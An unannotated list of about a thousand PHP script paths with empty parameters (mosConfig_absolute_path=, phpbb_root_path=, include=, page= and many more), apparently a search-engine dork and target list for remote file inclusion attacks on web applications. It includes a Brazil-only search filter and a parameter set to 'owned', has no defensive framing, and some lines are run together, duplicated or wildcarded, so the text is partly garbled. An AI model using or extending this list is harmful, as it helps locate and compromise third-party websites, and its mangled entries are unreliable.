inc/cmses/aedating4CMS.php?dir[inc]= flashchat site:br bp_ncom.php?bnrep=&#13;
/jscript.php?my_ms[root]=&#13;
/popup_window.php?site_isp_root=&#13;
/surveys/survey.inc.php?path=&#13;
index.php?body=&#13;
enc/content.php?Home_Path=&#13;
/sources/functions.php?CONFIG[main_path]=&#13;
/embed/day.php?path=&#13;
/includes/dbal.php?eqdkp_root_path=&#13;
sources/join.php?FORM[url]=owned&amp;CONFIG[captcha]=1&amp;CONFIG[path]=&#13;
/includes/kb_constants.php?module_root_path=&#13;
/components/com_facileforms/facileforms.frame.php?ff_compath=&#13;
skins/advanced/advanced1.php?pluginpath[0]=&#13;
/components/com_zoom/includes/database.php?mosConfig_absolute_path=&#13;
/main.php?sayfa=&#13;
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=&#13;
/addpost_newpoll.php?addpoll=preview&amp;thispath=&#13;
/header.php?abspath=&#13;
/modules/vwar/admin/admin.php?vwar_root=&#13;
/skin/zero_vote/error.php?dir=&#13;
/modules/TotalCalendar/about.php?inc_dir=&#13;
login.php?dir=&#13;
index.php?pageurl=&#13;
index.php?id=&#13;
content.php?page=&#13;
admin.php?page=&#13;
SQuery/lib/gore.php?libpath=&#13;
index2.php?p=&#13;
config.php?_CCFG[_PKG_PATH_DBSE]=&#13;
akocomments.php?mosConfig_absolute_path=&#13;
index.php?lang=gr&amp;file&#13;
index.php?pag=&#13;
index.php?incl=&#13;
avatar.php?page=&#13;
index.php?x= index.php?mode=index.php?stranica=&#13;
index.php?sub=index.php?id=index.php?t=&#13;
index.php?menu=&#13;
index0.php?show=&#13;
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= /tools/send_reminders.php?includedir= day.php?date=&#13;
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /tags.php?BBCodeFile=&#13;
index.php?topic=&#13;
index.php?u=administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=&#13;
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=modules/My_eGery/index.php?basepath=&#13;
/modules/vwar/admin/admin.php?vwar_root=index.php?loc=&#13;
.br/index.php?loc=&#13;
myevent.php?myevent_path=&#13;
includes/functions.php?phpbb_root_path=&#13;
index.php?template=&#13;
search.php?cutepath=&#13;
administrator/components/com_webring/admin.webring.docs.php?component_dir=&#13;
help.php?css_path=&#13;
big.php?pathtotemplate=&#13;
includes/search.php?GlobalSettings[templatesDirectory]=&#13;
interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=&#13;
modules/My_eGery/index.php?basepath=&#13;
/includes/orderSuccess.inc.php?glob=1&amp;cart_order_id=1&amp;glob[rootDir]=&#13;
/class.mysql.php?path_to_bt_dir=&#13;
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=&#13;
/squirrelcart/cart_content.php?cart_isp_root=&#13;
/modules/Forums/admin/admin_styles.php?phpbb_root_path=&#13;
index.php?url=&#13;
index.php?openfile=&#13;
index.php?side=&#13;
index.php?doc=&#13;
index.php?principal=&#13;
index.php?rage=&#13;
index.php?place=&#13;
index.php?dsp=&#13;
index.php?lg=&#13;
index.php?pilih=&#13;
template.php?pagina=&#13;
contenido.php?sec=&#13;
index_principal.php?pagina=&#13;
home.php?pagina=&#13;
noticias.php?arq=&#13;
default.php?page=&#13;
index.php?meio.php=&#13;
index.php?screen=&#13;
index.php?langc=&#13;
htmltonuke.php?filnavn=&#13;
ihm.php?p=&#13;
folder.php?id=&#13;
index.php?Load=&#13;
h.php?file=&#13;
h.php?page=&#13;
template.php?goto=&#13;
index1.php?menu=&#13;
index.php?ort=&#13;
index2.php?ID=&#13;
index2.php?url_page=&#13;
index1.php?dat=&#13;
port.php?content=&#13;
index1.php?x=&#13;
/contrib/yabbse/poc.php?poc_root_path=&#13;
/photoalb/lib/static/header.php?set_menu=&#13;
/bz/squito/photolist.inc.php?photoroot=&#13;
/ppa/inc/functions.inc.php?config[ppa_root_path]=&#13;
al_initialize.php?alpath=&#13;
/extensions/moblog/moblog_lib.php?basedir=&#13;
modules/MyGuests/signin.php?_AMGconfig[cfg_serverpath]=&#13;
/components/com_rsgery/rsgery.html.php?mosConfig_absolute_path=&#13;
inc/cmses/aedating4CMS.php?dir[inc]=&#13;
bp_ncom.php?bnrep=&#13;
/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=&#13;
/yabbse/Sources/Packages.php?sourcedir=&#13;
/include/main.php?config[search_disp]=true&amp;include_dir=&#13;
/includes/functions_portal.php?phpbb_root_path=&#13;
pagina.php?ir=&#13;
home.php?qry=&#13;
index3.php?url=&#13;
index1.php?action=&#13;
press.php?param=&#13;
view.php?adresa=&#13;
pagina.php?type=&#13;
file.php?ki=&#13;
gery.php?seite=&#13;
include.php?loader=&#13;
index2.php?module=&#13;
gery.php?strona=&#13;
general.php?itemnav=&#13;
template.php?h=&#13;
nota.php?header=&#13;
blank.php?ki=&#13;
enter.php?base_dir=&#13;
general.php?thispage=&#13;
view.php?var=&#13;
include.php?*&#13;
layout.php?pagina=&#13;
padrao.php?ir=&#13;
*inc*.php?left=&#13;
gery.php?eval=&#13;
index2.php?base_dir=&#13;
index1.php?op=&#13;
padrao.php?sivu=&#13;
enter.php?pagina=&#13;
principal.php?recipe=&#13;
file.php?pref=&#13;
standard.php?goto=&#13;
index2.php?phpbb_root_path=&#13;
path.php?action=&#13;
mod*.php?link=&#13;
include.php?nivel=&#13;
head.php?pollname=&#13;
default.php?name=&#13;
standard.php?param=&#13;
general.php?where=&#13;
head.php?*&#13;
principal.php?url=&#13;
home.php?ref=&#13;
down*.php?left=&#13;
standard.php?url=&#13;
press.php?*root*=&#13;
view.php?*&#13;
view.php?second=&#13;
include.php?loc=&#13;
template.php?second=&#13;
index.php?filepath=&#13;
home.php?pr=&#13;
index.php?module=&#13;
file.php?url=&#13;
home.php?itemnav=&#13;
default.php?read=&#13;
view.php?incl=&#13;
down*.php?to=&#13;
principal.php?viewpage=&#13;
index2.php?choix=&#13;
standard.php?seccion=&#13;
page.php?goto=&#13;
*.php?secc=&#13;
index3.php?chapter=&#13;
start.php?seccion=&#13;
base.php?middlePart=&#13;
template.php?panel=&#13;
path.php?menue=&#13;
padrao.php?secc=&#13;
*inc*.php?inc=&#13;
general.php?id=&#13;
standard.php?pref=&#13;
template.php?play=&#13;
layout.php?my=&#13;
padrao.php?seite=&#13;
press.php?i=&#13;
mod*.php?tipo=&#13;
gery.php?ref=&#13;
press.php?inc=&#13;
index2.php?left=&#13;
view.php?phpbb_root_path=&#13;
base.php?k=&#13;
index3.php?pag=&#13;
down*.php?OpenPage=&#13;
sitio.php?strona=&#13;
nota.php?seite=&#13;
index.php?basepath=&#13;
info.php?in=&#13;
start.php?where=&#13;
default.php?n=&#13;
down*.php?filepath=&#13;
main.php?corpo=&#13;
principal.php?filepath=&#13;
view.php?option=&#13;
show.php?*root*=&#13;
principal.php?pre=&#13;
start.php?p=&#13;
standard.php?home=&#13;
enter.php?numero=&#13;
index2.php?oldal=&#13;
general.php?addr=&#13;
general.php?tipo=&#13;
index.php?secao=&#13;
info.php?op=&#13;
template.php?page=&#13;
include.php?sivu=&#13;
index.php?modo=&#13;
show.php?module=&#13;
sitio.php?texto=&#13;
gery.php?oldal=&#13;
press.php?incl=&#13;
principal.php?w=&#13;
index2.php?pname=&#13;
path.php?path=&#13;
*inc*.php?category=&#13;
default.php?pag=&#13;
default.php?pr=&#13;
main.php?adresa=&#13;
default.php?to=&#13;
default.php?opcion=&#13;
main.php?str=&#13;
path.php?in=&#13;
base.php?ev=&#13;
principal.php?choix=&#13;
default.php?m=&#13;
include.php?name=&#13;
path.php?link=&#13;
view.php?pag=&#13;
principal.php?my=&#13;
index1.php?*&#13;
path.php?header=&#13;
*inc*.php?base_dir=&#13;
principal.php?basepath=&#13;
view.php?disp=&#13;
head.php?modo=&#13;
show.php?left=&#13;
gery.php?url=&#13;
sub*.php?*root*=&#13;
mod*.php?section=&#13;
general.php?name=&#13;
base.php?disp=&#13;
principal.php?module=&#13;
sub*.php?OpenPage=&#13;
gery.php?xlink=&#13;
mod*.php?to=&#13;
padrao.php?oldal=&#13;
sub*.php?lang=&#13;
down*.php?x=&#13;
enter.php?sp=&#13;
index2.php?loader=&#13;
enter.php?loader=&#13;
principal.php?disp=&#13;
sub*.php?viewpage=&#13;
template.php?pre=&#13;
mod*.php?goFile=&#13;
press.php?second=&#13;
base.php?seccion=&#13;
sitio.php?doshow=&#13;
*inc*.php?type=&#13;
show.php?filepath=&#13;
sitio.php?qry=&#13;
general.php?pr=&#13;
layout.php?panel=&#13;
pagina.php?go=&#13;
press.php?*&#13;
default.php?var=&#13;
sub*.php?corpo=&#13;
file.php?viewpage=&#13;
press.php?itemnav=&#13;
mod*.php?ev=&#13;
blank.php?OpenPage=&#13;
head.php?tipo=&#13;
sitio.php?sec=&#13;
default.php?cmd=&#13;
blank.php?channel=&#13;
mod*.php?j=&#13;
layout.php?modo=&#13;
head.php?pageweb=&#13;
path.php?type=&#13;
layout.php?g=&#13;
nota.php?base_dir=&#13;
index2.php?showpage=&#13;
index3.php?type=&#13;
base.php?cont=&#13;
mod*.php?chapter=&#13;
sitio.php?ev=&#13;
home.php?sekce=&#13;
sitio.php?sp=&#13;
nota.php?tipo=&#13;
view.php?to=&#13;
include.php?middle=&#13;
include.php?phpbb_root_path=&#13;
index2.php?include=&#13;
nota.php?itemnav=&#13;
include.php?option=&#13;
index2.php?type=&#13;
base.php?link=&#13;
path.php?chapter=&#13;
show.php?sp=&#13;
home.php?section=&#13;
default.php?y=&#13;
gery.php?*&#13;
pagina.php?link=&#13;
index1.php?o=&#13;
gery.php?addr=&#13;
*inc*.php?menu=&#13;
path.php?where=&#13;
pagina.php?home=&#13;
file.php?doshow=&#13;
index3.php?pname=&#13;
nota.php?in=&#13;
path.php?middlePart=&#13;
down*.php?sp=&#13;
page.php?module=&#13;
index3.php?ev=&#13;
standard.php?eval=&#13;
path.php?y=&#13;
template.php?qry=&#13;
start.php?option=&#13;
info.php?subject=&#13;
page.php?abre=&#13;
sub*.php?g=&#13;
home.php?g=&#13;
file.php?play=&#13;
start.php?loader=&#13;
start.php?showpage=&#13;
info.php?ref=&#13;
pagina.php?id=&#13;
blank.php?name=&#13;
head.php?str=&#13;
print.php?header=&#13;
index3.php?mid=&#13;
down*.php?disp=&#13;
blank.php?j=&#13;
path.php?goto=&#13;
default.php?type=&#13;
mod*.php?incl=&#13;
path.php?filepath=&#13;
gery.php?base_dir=&#13;
show.php?middlePart=&#13;
*inc*.php?to=&#13;
layout.php?z=&#13;
view.php?seccion=&#13;
sitio.php?*root*=&#13;
file.php?strona=&#13;
mod*.php?pag=&#13;
index2.php?ref=&#13;
head.php?sekce=&#13;
layout.php?pref=&#13;
path.php?doshow=&#13;
path.php?panel=&#13;
file.php?pagina=&#13;
index2.php?e=&#13;
path.php?sp=&#13;
pagina.php?load=&#13;
general.php?section=&#13;
base.php?filepath=&#13;
include.php?content=&#13;
blank.php?basepath=&#13;
template.php?ref=&#13;
head.php?load=&#13;
main.php?subject=&#13;
file.php?y=&#13;
down*.php?ev=&#13;
padrao.php?choix=&#13;
index.php?channel=&#13;
nota.php?t=&#13;
blank.php?panel=&#13;
sub*.php?header=&#13;
info.php?var=&#13;
enter.php?read=&#13;
head.php?adresa=&#13;
print.php?param=&#13;
default.php?sp=&#13;
start.php?panel=&#13;
template.php?dir=&#13;
show.php?pre=&#13;
view.php?content=&#13;
print.php?strona=&#13;
sitio.php?inc=&#13;
info.php?header=&#13;
info.php?itemnav=&#13;
file.php?to=&#13;
base.php?itemnav=&#13;
standard.php?where=&#13;
sitio.php?modo=&#13;
sitio.php?disp=&#13;
print.php?addr=&#13;
mod*.php?oldal=&#13;
sub*.php?go=&#13;
start.php?load=&#13;
index2.php?option=&#13;
blank.php?mod=&#13;
index3.php?inc=&#13;
standard.php?my=&#13;
enter.php?y=&#13;
base.php?pageweb=&#13;
padrao.php?*root*=&#13;
main.php?action=&#13;
pagina.php?path=&#13;
sub*.php?phpbb_root_path=&#13;
path.php?home=&#13;
index3.php?middle=&#13;
index3.php?get=&#13;
default.php?seccion=&#13;
print.php?numero=&#13;
include.php?in=&#13;
include.php?secao=&#13;
sub*.php?sec=&#13;
home.php?channel=&#13;
base.php?body=&#13;
enter.php?ir=&#13;
home.php?oldal=&#13;
head.php?pag=&#13;
general.php?menu=&#13;
nota.php?seccion=&#13;
path.php?xlink=&#13;
page.php?mid=&#13;
index1.php?link=&#13;
blank.php?sp=&#13;
default.php?panel=&#13;
*inc*.php?doshow=&#13;
blank.php?id=&#13;
print.php?read=&#13;
sitio.php?destino=&#13;
principal.php?d=&#13;
start.php?name=&#13;
default.php?chapter=&#13;
head.php?goto=&#13;
path.php?qry=&#13;
default.php?*root*=&#13;
enter.php?cmd=&#13;
file.php?include=&#13;
enter.php?body=&#13;
index.php?chapter=&#13;
include.php?panel=&#13;
default.php?choix=&#13;
start.php?oldal=&#13;
down*.php?ir=&#13;
nota.php?module=&#13;
info.php?xlink=&#13;
enter.php?lang=&#13;
general.php?redirect=&#13;
view.php?recipe=&#13;
home.php?ir=&#13;
padrao.php?open=&#13;
base.php?subject=&#13;
padrao.php?u=&#13;
sub*.php?my=&#13;
enter.php?type=&#13;
blank.php?ir=&#13;
page.php?showpage=&#13;
home.php?disp=&#13;
index3.php?secc=&#13;
home.php?panel=&#13;
index1.php?pr=&#13;
main.php?ref=&#13;
layout.php?link=&#13;
standard.php?qry=&#13;
index2.php?thispage=&#13;
index3.php?pollname=&#13;
pagina.php?cmd=&#13;
view.php?body=&#13;
head.php?rub=&#13;
standard.php?include=&#13;
path.php?secao=&#13;
press.php?opcion=&#13;
gery.php?tipo=&#13;
index1.php?v=&#13;
pagina.php?secao=&#13;
standard.php?secc=&#13;
gery.php?loader=&#13;
index3.php?include=&#13;
pagina.php?to=&#13;
enter.php?strona=&#13;
sub*.php?s=&#13;
enter.php?get=&#13;
path.php?var=&#13;
general.php?subject=&#13;
enter.php?pa=&#13;
include.php?header=&#13;
include.php?mid=&#13;
blank.php?incl=&#13;
index2.php?corpo=&#13;
index1.php?incl=&#13;
home.php?choix=&#13;
index1.php?c=&#13;
index2.php?var=&#13;
main.php?pref=&#13;
index1.php?pname=&#13;
path.php?incl=&#13;
info.php?recipe=&#13;
view.php?sec=&#13;
file.php?where=&#13;
print.php?name=&#13;
info.php?c=&#13;
principal.php?cont=&#13;
print.php?menue=&#13;
info.php?f=&#13;
padrao.php?xlink=&#13;
index1.php?url=&#13;
gery.php?basepath=&#13;
template.php?mid=&#13;
sub*.php?id=&#13;
start.php?corpo=&#13;
file.php?chapter=&#13;
home.php?chapter=&#13;
standard.php?chapter=&#13;
press.php?page=&#13;
nota.php?n=&#13;
start.php?adresa=&#13;
default.php?e=&#13;
sub*.php?itemnav=&#13;
standard.php?go=&#13;
sitio.php?menu=&#13;
press.php?goFile=&#13;
principal.php?id=&#13;
down*.php?incl=&#13;
principal.php?z=&#13;
main.php?my=&#13;
start.php?ir=&#13;
info.php?ki=&#13;
file.php?loader=&#13;
index.php?mid=&#13;
down*.php?seite=&#13;
base.php?lang=&#13;
nota.php?inc=&#13;
standard.php?index=&#13;
index1.php?var=&#13;
principal.php?p=&#13;
pagina.php?index=&#13;
view.php?qry=&#13;
home.php?tipo=&#13;
page.php?numero=&#13;
index1.php?strona=&#13;
show.php?inc=&#13;
index2.php?redirect=&#13;
pagina.php?middlePart=&#13;
template.php?base_dir=&#13;
info.php?mid=&#13;
home.php?module=&#13;
general.php?left=&#13;
print.php?doshow=&#13;
general.php?page=&#13;
path.php?adresa=&#13;
page.php?seite=&#13;
home.php?menu=&#13;
index2.php?open=&#13;
blank.php?pname=&#13;
sub*.php?modo=&#13;
index2.php?goto=&#13;
path.php?subject=&#13;
general.php?sivu=&#13;
general.php?read=&#13;
principal.php?ev=&#13;
press.php?to=&#13;
main.php?middle=&#13;
print.php?pollname=&#13;
index2.php?strona=&#13;
template.php?f=&#13;
template.php?e=&#13;
press.php?pagina=&#13;
print.php?ki=&#13;
page.php?z=&#13;
enter.php?left=&#13;
head.php?middlePart=&#13;
gery.php?ev=&#13;
index3.php?ref=&#13;
file.php?id=&#13;
print.php?loc=&#13;
sitio.php?body=&#13;
pagina.php?n=&#13;
down*.php?s=&#13;
padrao.php?a=&#13;
page.php?OpenPage=&#13;
gery.php?option=&#13;
mod*.php?sekce=&#13;
template.php?thispage=&#13;
head.php?viewpage=&#13;
file.php?incl=&#13;
sitio.php?e=&#13;
page.php?cont=&#13;
sub*.php?adresa=&#13;
index2.php?pg=&#13;
layout.php?thispage=&#13;
padrao.php?body=&#13;
base.php?t=&#13;
press.php?redirect=&#13;
pagina.php?seccion=&#13;
layout.php?action=&#13;
sitio.php?option=&#13;
index2.php?category=&#13;
pagina.php?lang=&#13;
include.php?ref=&#13;
index3.php?thispage=&#13;
sub*.php?seite=&#13;
layout.php?addr=&#13;
nota.php?mid=&#13;
page.php?p=&#13;
mod*.php?corpo=&#13;
press.php?t=&#13;
blank.php?category=&#13;
*inc*.php?y=&#13;
nota.php?category=&#13;
show.php?d=&#13;
enter.php?menue=&#13;
index1.php?t=&#13;
nota.php?adresa=&#13;
main.php?thispage=&#13;
layout.php?tipo=&#13;
index3.php?d=&#13;
enter.php?b=&#13;
main.php?loc=&#13;
standard.php?z=&#13;
show.php?base_dir=&#13;
sitio.php?middlePart=&#13;
template.php?a=&#13;
page.php?read=&#13;
index.php?param=&#13;
default.php?channel=&#13;
sub*.php?link=&#13;
padrao.php?texto=&#13;
base.php?base_dir=&#13;
file.php?texto=&#13;
base.php?middle=&#13;
pagina.php?base_dir=&#13;
print.php?tipo=&#13;
principal.php?pag=&#13;
index2.php?loc=&#13;
nota.php?option=&#13;
home.php?index=&#13;
print.php?base_dir=&#13;
file.php?get=&#13;
info.php?content=&#13;
default.php?goto=&#13;
start.php?include=&#13;
print.php?option=&#13;
default.php?v=&#13;
base.php?numero=&#13;
index2.php?qry=&#13;
sub*.php?secao=&#13;
sub*.php?secc=&#13;
mod*.php?lang=&#13;
standard.php?pollname=&#13;
default.php?load=&#13;
show.php?j=&#13;
down*.php?pa=&#13;
standard.php?open=&#13;
file.php?disp=&#13;
press.php?xlink=&#13;
print.php?s=&#13;
mod*.php?secc=&#13;
index1.php?param=&#13;
index3.php?sivu=&#13;
mod*.php?pg=&#13;
layout.php?cmd=&#13;
info.php?phpbb_root_path=&#13;
print.php?OpenPage=&#13;
default.php?thispage=&#13;
enter.php?sec=&#13;
path.php?*&#13;
home.php?middlePart=&#13;
index3.php?channel=&#13;
template.php?sekce=&#13;
down*.php?goFile=&#13;
blank.php?header=&#13;
start.php?body=&#13;
base.php?module=&#13;
default.php?l=&#13;
index2.php?texto=&#13;
home.php?eval=&#13;
padrao.php?section=&#13;
blank.php?goFile=&#13;
index.php?index=&#13;
layout.php?ir=&#13;
blank.php?pollname=&#13;
include.php?x=&#13;
start.php?pageweb=&#13;
gery.php?rub=&#13;
template.php?sp=&#13;
sub*.php?basepath=&#13;
standard.php?section=&#13;
enter.php?abre=&#13;
index1.php?pa=&#13;
principal.php?seite=&#13;
gery.php?chapter=&#13;
nota.php?qry=&#13;
pagina.php?pagina=&#13;
default.php?menu=&#13;
standard.php?*&#13;
default.php?abre=&#13;
press.php?pg=&#13;
start.php?nivel=&#13;
index1.php?filepath=&#13;
padrao.php?op=&#13;
mod*.php?pre=&#13;
default.php?pa=&#13;
press.php?strona=&#13;
nota.php?cmd=&#13;
standard.php?abre=&#13;
general.php?seccion=&#13;
index1.php?itemnav=&#13;
layout.php?seite=&#13;
home.php?pollname=&#13;
path.php?left=&#13;
down*.php?inc=&#13;
include.php?channel=&#13;
print.php?dir=&#13;
main.php?disp=&#13;
print.php?pre=&#13;
padrao.php?cont=&#13;
padrao.php?menu=&#13;
path.php?addr=&#13;
base.php?sekce=&#13;
pagina.php?loader=&#13;
page.php?go=&#13;
press.php?category=&#13;
gery.php?left=&#13;
down*.php?qry=&#13;
file.php?second=&#13;
include.php?pag=&#13;
base.php?ir=&#13;
template.php?addr=&#13;
sitio.php?nivel=&#13;
include.php?destino=&#13;
head.php?disp=&#13;
general.php?w=&#13;
gery.php?sec=&#13;
base.php?var=&#13;
enter.php?addr=&#13;
enter.php?go=&#13;
page.php?middle=&#13;
start.php?home=&#13;
info.php?rub=&#13;
pagina.php?OpenPage=&#13;
head.php?content=&#13;
principal.php?pref=&#13;
home.php?in=&#13;
path.php?disp=&#13;
main.php?index=&#13;
file.php?eval=&#13;
press.php?base_dir=&#13;
main.php?content=&#13;
show.php?disp=&#13;
index.php?opcion=&#13;
view.php?loader=&#13;
down*.php?strona=&#13;
principal.php?seccion=&#13;
principal.php?n=&#13;
blank.php?link=&#13;
file.php?sivu=&#13;
info.php?adresa=&#13;
*inc*.php?ki=&#13;
padrao.php?incl=&#13;
main.php?eval=&#13;
gery.php?nivel=&#13;
sub*.php?goFile=&#13;
info.php?sec=&#13;
main.php?include=&#13;
main.php?page=&#13;
base.php?*&#13;
home.php?rub=&#13;
default.php?k=&#13;
index3.php?t=&#13;
file.php?showpage=&#13;
enter.php?home=&#13;
info.php?menue=&#13;
index.php?middlePart=&#13;
blank.php?corpo=&#13;
press.php?where=&#13;
path.php?p=&#13;
page.php?*&#13;
enter.php?path=&#13;
press.php?ir=&#13;
index1.php?path=&#13;
sub*.php?option=&#13;
sub*.php?pag=&#13;
layout.php?where=&#13;
info.php?o=&#13;
file.php?oldal=&#13;
template.php?menue=&#13;
press.php?abre=&#13;
layout.php?OpenPage=&#13;
home.php?play=&#13;
sitio.php?pg=&#13;
main.php?filepath=&#13;
general.php?to=&#13;
index1.php?*root*=&#13;
show.php?qry=&#13;
print.php?where=&#13;
index2.php?itemnav=&#13;
pagina.php?q=&#13;
enter.php?str=&#13;
enter.php?name=&#13;
sitio.php?addr=&#13;
enter.php?incl=&#13;
index3.php?mod=&#13;
template.php?opcion=&#13;
nota.php?pre=&#13;
head.php?lang=&#13;
pagina.php?g=&#13;
include.php?tipo=&#13;
default.php?loc=&#13;
principal.php?destino=&#13;
index3.php?menue=&#13;
index.php?y=&#13;
home.php?opcion=&#13;
print.php?middlePart=&#13;
sitio.php?secc=&#13;
show.php?read=&#13;
standard.php?var=&#13;
info.php?param=&#13;
head.php?start=&#13;
view.php?oldal=&#13;
mod*.php?play=&#13;
gery.php?h=&#13;
pagina.php?mid=&#13;
sub*.php?thispage=&#13;
layout.php?loader=&#13;
enter.php?qry=&#13;
padrao.php?filepath=&#13;
include.php?ir=&#13;
sub*.php?u=&#13;
base.php?chapter=&#13;
press.php?pageweb=&#13;
sub*.php?pa=&#13;
enter.php?texto=&#13;
home.php?link=&#13;
template.php?*&#13;
gery.php?action=&#13;
base.php?oldal=&#13;
index3.php?dir=&#13;
include.php?ki=&#13;
index3.php?body=&#13;
standard.php?oldal=&#13;
nota.php?showpage=&#13;
general.php?f=&#13;
padrao.php?pag=&#13;
*inc*.php?rub=&#13;
index2.php?adresa=&#13;
head.php?sec=&#13;
nota.php?filepath=&#13;
print.php?link=&#13;
gery.php?pname=&#13;
show.php?pname=&#13;
base.php?loc=&#13;
file.php?q=&#13;
gery.php?sivu=&#13;
padrao.php?header=&#13;
layout.php?abre=&#13;
index3.php?pref=&#13;
enter.php?subject=&#13;
page.php?modo=&#13;
page.php?left=&#13;
base.php?abre=&#13;
index3.php?addr=&#13;
blank.php?pr=&#13;
*inc*.php?get=&#13;
print.php?play=&#13;
padrao.php?secao=&#13;
index.php?str=&#13;
general.php?sekce=&#13;
show.php?m=&#13;
head.php?b=&#13;
index1.php?mod=&#13;
home.php?showpage=&#13;
home.php?cmd=&#13;
index1.php?read=&#13;
page.php?load=&#13;
general.php?choix=&#13;
home.php?my=&#13;
start.php?param=&#13;
layout.php?sekce=&#13;
enter.php?module=&#13;
mod*.php?secao=&#13;
show.php?n=&#13;
start.php?pname=&#13;
down*.php?doshow=&#13;
index2.php?pre=&#13;
layout.php?nivel=&#13;
home.php?base_dir=&#13;
include.php?eval=&#13;
standard.php?xlink=&#13;
info.php?home=&#13;
general.php?body=&#13;
head.php?play=&#13;
file.php?index=&#13;
mod*.php?OpenPage=&#13;
index.php?b=&#13;
principal.php?ki=&#13;
sub*.php?panel=&#13;
path.php?sec=&#13;
nota.php?left=&#13;
default.php?header=&#13;
padrao.php?qry=&#13;
file.php?corpo=&#13;
padrao.php?strona=&#13;
sub*.php?z=&#13;
pagina.php?include=&#13;
page.php?link=&#13;
start.php?abre=&#13;
print.php?goFile=&#13;
*inc*.php?c=&#13;
down*.php?cmd=&#13;
home.php?middle=&#13;
sub*.php?open=&#13;
include.php?second=&#13;
sitio.php?menue=&#13;
path.php?tipo=&#13;
home.php?addr=&#13;
gery.php?pref=&#13;
pagina.php?k=&#13;
head.php?strona=&#13;
general.php?e=&#13;
blank.php?get=&#13;
blank.php?sivu=&#13;
sitio.php?read=&#13;
home.php?thispage=&#13;
pagina.php?loc=&#13;
layout.php?qry=&#13;
print.php?*root*=&#13;
show.php?to=&#13;
view.php?u=&#13;
view.php?chapter=&#13;
principal.php?nivel=&#13;
info.php?secao=&#13;
nota.php?abre=&#13;
standard.php?menu=&#13;
index2.php?pollname=&#13;
index3.php?path=&#13;
index.php?base_dir=&#13;
general.php?secao=&#13;
mod*.php?home=&#13;
down*.php?section=&#13;
default.php?index=&#13;
general.php?doshow=&#13;
padrao.php?abre=&#13;
enter.php?seite=&#13;
down*.php?lang=&#13;
main.php?xlink=&#13;
index3.php?base_dir=&#13;
gery.php?redirect=&#13;
layout.php?basepath=&#13;
pagina.php?modo=&#13;
index.php?adresa=&#13;
down*.php?u=&#13;
main.php?mod=&#13;
file.php?start=&#13;
view.php?redirect=&#13;
index2.php?u=&#13;
padrao.php?*&#13;
info.php?ev=&#13;
index1.php?nivel=&#13;
include.php?seccion=&#13;
view.php?lang=&#13;
mod*.php?include=&#13;
mod*.php?seccion=&#13;
principal.php?pollname=&#13;
include.php?read=&#13;
press.php?rub=&#13;
index2.php?incl=&#13;
pagina.php?chapter=&#13;
view.php?middle=&#13;
print.php?sekce=&#13;
padrao.php?pname=&#13;
head.php?ref=&#13;
principal.php?link=&#13;
gery.php?menue=&#13;
template.php?op=&#13;
info.php?doshow=&#13;
default.php?sivu=&#13;
nota.php?pagina=&#13;
sitio.php?content=&#13;
press.php?thispage=&#13;
press.php?pa=&#13;
index1.php?redirect=&#13;
padrao.php?menue=&#13;
index2.php?sekce=&#13;
mod*.php?d=&#13;
include.php?filepath=&#13;
principal.php?l=&#13;
layout.php?oldal=&#13;
include.php?b=&#13;
layout.php?pollname=&#13;
start.php?play=&#13;
print.php?r=&#13;
info.php?*&#13;
sub*.php?*&#13;
* *=&#13;
mod*.php?addr=&#13;
base.php?category=&#13;
index2.php?d=&#13;
mod*.php?phpbb_root_path=&#13;
default.php?include=&#13;
press.php?module=&#13;
default.php?module=&#13;
info.php?pname=&#13;
path.php?id=&#13;
general.php?get=&#13;
press.php?path=&#13;
padrao.php?sekce=&#13;
base.php?ki=&#13;
file.php?cmd=&#13;
layout.php?section=&#13;
press.php?include=&#13;
mod*.php?destino=&#13;
base.php?doshow=&#13;
principal.php?load=&#13;
print.php?type=&#13;
index1.php?adresa=&#13;
index3.php?pre=&#13;
standard.php?cont=&#13;
gery.php?open=&#13;
blank.php?read=&#13;
sitio.php?redirect=&#13;
index1.php?cmd=&#13;
info.php?redirect=&#13;
file.php?load=&#13;
index3.php?itemnav=&#13;
gery.php?mod=&#13;
enter.php?ref=&#13;
down*.php?t=&#13;
view.php?goFile=&#13;
file.php?var=&#13;
sitio.php?ir=&#13;
show.php?b=&#13;
sitio.php?param=&#13;
sub*.php?rub=&#13;
print.php?opcion=&#13;
press.php?middle=&#13;
info.php?ir=&#13;
home.php?basepath=&#13;
blank.php?section=&#13;
include.php?to=&#13;
start.php?sp=&#13;
index3.php?name=&#13;
template.php?showpage=&#13;
view.php?ki=&#13;
index1.php?sekce=&#13;
press.php?option=&#13;
nota.php?home=&#13;
gery.php?my=&#13;
show.php?mid=&#13;
blank.php?o=&#13;
sitio.php?pr=&#13;
index3.php?destino=&#13;
main.php?body=&#13;
blank.php?lang=&#13;
path.php?thispage=&#13;
padrao.php?OpenPage=&#13;
info.php?pageweb=&#13;
blank.php?h=&#13;
head.php?incl=&#13;
principal.php?ref=&#13;
start.php?go=&#13;
file.php?action=&#13;
template.php?t=&#13;
base.php?mid=&#13;
start.php?b=&#13;
start.php?lang=&#13;
default.php?rub=&#13;
head.php?read=&#13;
show.php?cmd=&#13;
press.php?get=&#13;
principal.php?secc=&#13;
gery.php?menu=&#13;
gery.php?corpo=&#13;
include.php?module=&#13;
page.php?redirect=&#13;
gery.php?filepath=&#13;
general.php?ir=&#13;
file.php?ref=&#13;
index1.php?seite=&#13;
include.php?pageweb=&#13;
show.php?seccion=&#13;
mod*.php?pagina=&#13;
sub*.php?name=&#13;
padrao.php?c=&#13;
padrao.php?eval=&#13;
file.php?ev=&#13;
default.php?body=&#13;
enter.php?itemnav=&#13;
blank.php?var=&#13;
index.php?addr=&#13;
blank.php?oldal=&#13;
nota.php?url=&#13;
index2.php?action=&#13;
blank.php?phpbb_root_path=&#13;
mod*.php?var=&#13;
mod*.php?strona=&#13;
nota.php?nivel=&#13;
template.php?content=&#13;
mod*.php?content=&#13;
default.php?f=&#13;
view.php?goto=&#13;
principal.php?abre=&#13;
pagina.php?filepath=&#13;
nota.php?link=&#13;
template.php?tipo=&#13;
index3.php?q=&#13;
page.php?adresa=&#13;
sitio.php?category=&#13;
index2.php?link=&#13;
sub*.php?k=&#13;
